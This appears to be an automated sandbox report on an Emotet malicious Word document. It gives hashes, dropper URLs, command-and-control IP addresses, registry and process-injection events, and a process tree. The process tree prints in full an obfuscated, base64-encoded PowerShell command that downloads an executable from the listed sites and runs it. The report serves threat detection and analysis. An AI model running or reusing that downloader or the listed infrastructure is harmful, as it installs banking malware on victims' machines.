emotet | 127c406b36e40a2277c416de6a955130dba4cb23be857da9a3987fb98a170d32

General

Target

JVDT20_09.doc
Size

161KB
MD5

c8db50682c9c51a0a5b220aca08a8b5f
SHA1

f0e2afb8a556bb000e169e24e84c3af9942429fe
SHA256

127c406b36e40a2277c416de6a955130dba4cb23be857da9a3987fb98a170d32
SHA512

cece058757e669d26a73ad58d9c4f5c02ae7118cf9c5fc78e3b92a4bc8b268c500867e7b3f131432f07c422fc26976d17ea8d4f98bd4a783cfe19e88e97fa3ee

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://templatejson.com/awrrn/Kw10uo/

exe.dropper

https://hosting.mybestheme.com/aikjj0q/8/

exe.dropper

https://tastes2plate.com/wp-content/uploads/6/

exe.dropper

http://madeirawildlife.com/wp-admin/zuWZW/

exe.dropper

http://senyumdesa.org/wp-admin/aC4/

exe.dropper

https://ibuyoldwebsites.com/modules/QVtEr7/

exe.dropper

http://blog.zunapro.com/wp-admin/js/widgets/EH4agl/

Extracted

Family

emotet

C2

74.219.172.26:80

134.209.36.254:8080

104.156.59.7:8080

120.138.30.150:8080

194.187.133.160:443

104.236.246.93:8080

74.208.45.104:8080

78.187.156.31:80

187.161.206.24:80

94.23.216.33:80

172.91.208.86:80

91.211.88.52:7080

50.91.114.38:80

200.123.150.89:443

121.124.124.40:7080

62.75.141.82:80

5.196.74.210:8080

24.137.76.62:80

85.105.205.77:8080

139.130.242.43:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1632	1112	powershell.exe

Emotet Payload 8 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/676-15-0x0000000000260000-0x0000000000272000-memory.dmp	emotet
behavioral1/memory/676-15-0x0000000000260000-0x0000000000272000-memory.dmp	emotet
behavioral1/memory/676-16-0x0000000000280000-0x0000000000290000-memory.dmp	emotet
behavioral1/memory/676-16-0x0000000000280000-0x0000000000290000-memory.dmp	emotet
behavioral1/memory/908-20-0x0000000000320000-0x0000000000332000-memory.dmp	emotet
behavioral1/memory/908-20-0x0000000000320000-0x0000000000332000-memory.dmp	emotet
behavioral1/memory/908-21-0x0000000000340000-0x0000000000350000-memory.dmp	emotet
behavioral1/memory/908-21-0x0000000000340000-0x0000000000350000-memory.dmp	emotet

Blacklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
5	1632	powershell.exe
7	1632	powershell.exe
9	1632	powershell.exe
11	1632	powershell.exe
13	1632	powershell.exe
15	1632	powershell.exe
17	1632	powershell.exe

Executes dropped EXE 2 IoCs

Processes:

J_eilb.exeJavaScriptCollectionAgent.exe

pid process

676 J_eilb.exe
908 JavaScriptCollectionAgent.exe

pid	process
676	J_eilb.exe
908	JavaScriptCollectionAgent.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exeJ_eilb.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe	J_eilb.exe

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{67E9C28C-4072-45CD-A7CC-1CF034166B51}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1108 WINWORD.EXE

pid	process
1108	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exeJavaScriptCollectionAgent.exe

pid	process
1632	powershell.exe
1632	powershell.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1632 powershell.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXEJ_eilb.exeJavaScriptCollectionAgent.exe

pid process

1108 WINWORD.EXE
1108 WINWORD.EXE
676 J_eilb.exe
676 J_eilb.exe
908 JavaScriptCollectionAgent.exe
908 JavaScriptCollectionAgent.exe

description	pid	process
Token: SeDebugPrivilege	1632	powershell.exe

pid	process
1108	WINWORD.EXE
1108	WINWORD.EXE
676	J_eilb.exe
676	J_eilb.exe
908	JavaScriptCollectionAgent.exe
908	JavaScriptCollectionAgent.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

powershell.exeJ_eilb.exe

description	pid	process	target process
PID 1632 wrote to memory of 676	1632	powershell.exe	J_eilb.exe
PID 1632 wrote to memory of 676	1632	powershell.exe	J_eilb.exe
PID 1632 wrote to memory of 676	1632	powershell.exe	J_eilb.exe
PID 1632 wrote to memory of 676	1632	powershell.exe	J_eilb.exe
PID 676 wrote to memory of 908	676	J_eilb.exe	JavaScriptCollectionAgent.exe
PID 676 wrote to memory of 908	676	J_eilb.exe	JavaScriptCollectionAgent.exe
PID 676 wrote to memory of 908	676	J_eilb.exe	JavaScriptCollectionAgent.exe
PID 676 wrote to memory of 908	676	J_eilb.exe	JavaScriptCollectionAgent.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JVDT20_09.doc"
1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABJAHEAYQBqAG0AcAB5AD0AKAAoACcAVgAnACsAJwBiAHkAdgAnACkAKwAnAHgAJwArACcAagB6ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAZABJAGEAUgA4AGgANwBcAG8AZgBmADEARgBFAFkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAHUAYABSAGAASQB0AFkAYABwAFIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAsACAAdABsAHMAMQAnACsAJwAxACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEsAdwBwAHYANwBhAHoAIAA9ACAAKAAnAEoAJwArACcAXwBlACcAKwAoACcAaQBsACcAKwAnAGIAJwApACkAOwAkAEEAdAB4ADMAcQBlAGYAPQAoACcASAA5ACcAKwAnAGgAagAnACsAKAAnAHEAJwArACcAYQBxACcAKQApADsAJABGAHAAegBtAHYAagA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHEAJwArACgAJwBJACcAKwAnAEwARABpAGEAJwApACsAJwByADgAJwArACgAJwBoADcAJwArACcAcQAnACkAKwAoACcASQBMAE8AZgAnACsAJwBmACcAKwAnADEAZgBlACcAKwAnAHkAcQBJAEwAJwApACkALgAiAHIAYABFAFAAYABMAEEAYwBFACIAKAAoAFsAQwBoAEEAcgBdADEAMQAzACsAWwBDAGgAQQByAF0ANwAzACsAWwBDAGgAQQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEsAdwBwAHYANwBhAHoAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABTAHUAcAB4ADYAdQBrAD0AKAAoACcASABxACcAKwAnADgAbgBnACcAKwAnAF8AJwApACsAJwBwACcAKQA7ACQATgA1ADgAaQB5AGEAMgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAEwASQBFAE4AdAA7ACQAVgB6ADAAYgBnAGMANgA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AdABlACcAKQArACgAJwBtAHAAbABhAHQAJwArACcAZQAnACsAJwBqACcAKwAnAHMAbwBuAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYQB3AHIAcgAnACsAJwBuAC8ASwB3ADEAJwArACcAMAB1ACcAKwAnAG8AJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwAHMAOgAnACsAJwAvAC8AaAAnACkAKwAoACcAbwAnACsAJwBzAHQAaQBuAGcAJwApACsAKAAnAC4AbQB5ACcAKwAnAGIAJwApACsAJwBlACcAKwAnAHMAJwArACcAdAAnACsAKAAnAGgAJwArACcAZQBtACcAKQArACgAJwBlAC4AYwBvAG0AJwArACcALwBhAGkAJwArACcAawBqAGoAJwApACsAKAAnADAAJwArACcAcQAvADgALwAnACkAKwAnACoAJwArACcAaAB0ACcAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKQArACcALwB0ACcAKwAoACcAYQBzAHQAZQAnACsAJwBzACcAKQArACgAJwAyAHAAJwArACcAbABhAHQAZQAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAKAAnAG8AJwArACcAbgB0AGUAJwApACsAJwBuAHQAJwArACgAJwAvAHUAJwArACcAcAAnACkAKwAoACcAbABvACcAKwAnAGEAJwApACsAKAAnAGQAJwArACcAcwAvADYAJwArACcALwAqAGgAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBtACcAKwAoACcAYQBkACcAKwAnAGUAJwApACsAKAAnAGkAcgAnACsAJwBhACcAKQArACcAdwAnACsAKAAnAGkAJwArACcAbABkAGwAJwApACsAJwBpACcAKwAnAGYAJwArACcAZQAnACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZABtAGkAJwArACcAbgAvAHoAdQAnACkAKwAoACcAVwAnACsAJwBaAFcALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AcwAnACsAKAAnAGUAbgAnACsAJwB5ACcAKQArACcAdQAnACsAJwBtACcAKwAoACcAZABlAHMAYQAnACsAJwAuACcAKwAnAG8AJwApACsAJwByACcAKwAoACcAZwAvAHcAcAAnACsAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwAnACkAKwAoACcAYQAnACsAJwBDADQALwAqACcAKQArACgAJwBoACcAKwAnAHQAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvAGkAYgB1ACcAKwAnAHkAbwAnACkAKwAoACcAbABkACcAKwAnAHcAZQAnACkAKwAoACcAYgBzAGkAJwArACcAdABlAHMAJwApACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwBtAG8AZAAnACsAJwB1AGwAJwApACsAKAAnAGUAcwAvACcAKwAnAFEAJwApACsAKAAnAFYAJwArACcAdABFACcAKQArACcAcgAnACsAKAAnADcALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8ALwAnACsAJwBiAGwAJwApACsAKAAnAG8AZwAnACsAJwAuAHoAdQAnACsAJwBuAGEAcAByAG8ALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtACcAKwAnAGEAZAAnACsAKAAnAG0AJwArACcAaQBuAC8AJwApACsAJwBqAHMAJwArACgAJwAvACcAKwAnAHcAaQBkACcAKQArACgAJwBnAGUAJwArACcAdABzAC8ARQBIACcAKQArACgAJwA0AGEAJwArACcAZwBsACcAKQArACcALwAnACkALgAiAFMAYABwAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAA2AF8AMQAxAHgAaAA9ACgAKAAnAFMAagBuAHgAcQAnACsAJwBfACcAKQArACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABIAGMAZABqAHEAbAB0ACAAaQBuACAAJABWAHoAMABiAGcAYwA2ACkAewB0AHIAeQB7ACQATgA1ADgAaQB5AGEAMgAuACIAZABvAGAAdwBOAEwAYABvAEEARABGAGAASQBMAEUAIgAoACQASABjAGQAagBxAGwAdAAsACAAJABGAHAAegBtAHYAagA2ACkAOwAkAFgAaQBvAHoANwBwADEAPQAoACcARwAnACsAJwBoACcAKwAoACcAcQBhAGgAJwArACcAMwB3ACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEYAcAB6AG0AdgBqADYAKQAuACIAbABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADUANwA0ADcAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUALQBJACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKQAoACQARgBwAHoAbQB2AGoANgApADsAJABIAF8AdgBhADIAYgBjAD0AKAAoACcAWgAnACsAJwA5AHcAJwApACsAKAAnAGcAeQAnACsAJwBfAGwAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAcgAwAHYAMgBhADYAPQAoACgAJwBOACcAKwAnAHIAcwAnACkAKwAoACcAZwAnACsAJwBoAGoAOQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBlAGUAXwB6AGgAZwA9ACgAJwBJACcAKwAoACcAbQA5ACcAKwAnAHMAJwApACsAKAAnAGUAawAnACsAJwB2ACcAKQApAA==
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Users\Admin\Diar8h7\Off1fey\J_eilb.exe
  "C:\Users\Admin\Diar8h7\Off1fey\J_eilb.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe
    "C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:908

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Diar8h7\Off1fey\J_eilb.exe

Download Submit
C:\Users\Admin\dIaR8h7\off1FEY\J_eilb.exe

Download Submit
C:\Windows\SysWOW64\cliconfg\JavaScriptCollectionAgent.exe

Download Submit
memory/676-13-0x0000000000000000-mapping.dmp

Download
memory/676-15-0x0000000000260000-0x0000000000272000-memory.dmp

Filesize
72KB

Download
memory/676-16-0x0000000000280000-0x0000000000290000-memory.dmp

Filesize
64KB

Download
memory/900-22-0x000007FEF7770000-0x000007FEF79EA000-memory.dmp

Filesize
2.5MB

Download
memory/908-18-0x0000000000000000-mapping.dmp

Download
memory/908-20-0x0000000000320000-0x0000000000332000-memory.dmp

Filesize
72KB

Download
memory/908-21-0x0000000000340000-0x0000000000350000-memory.dmp

Filesize
64KB

Download
memory/1108-2-0x0000000008870000-0x0000000008874000-memory.dmp

Filesize
16KB

Download
memory/1632-8-0x000000001AB00000-0x000000001AB01000-memory.dmp

Filesize
4KB

Download
memory/1632-12-0x000000001B770000-0x000000001B771000-memory.dmp

Filesize
4KB

Download
memory/1632-11-0x000000001B570000-0x000000001B571000-memory.dmp

Filesize
4KB

Download
memory/1632-7-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1632-9-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/1632-6-0x000007FEE9200000-0x000007FEE9BEC000-memory.dmp

Filesize
9.9MB

Download
memory/1632-10-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads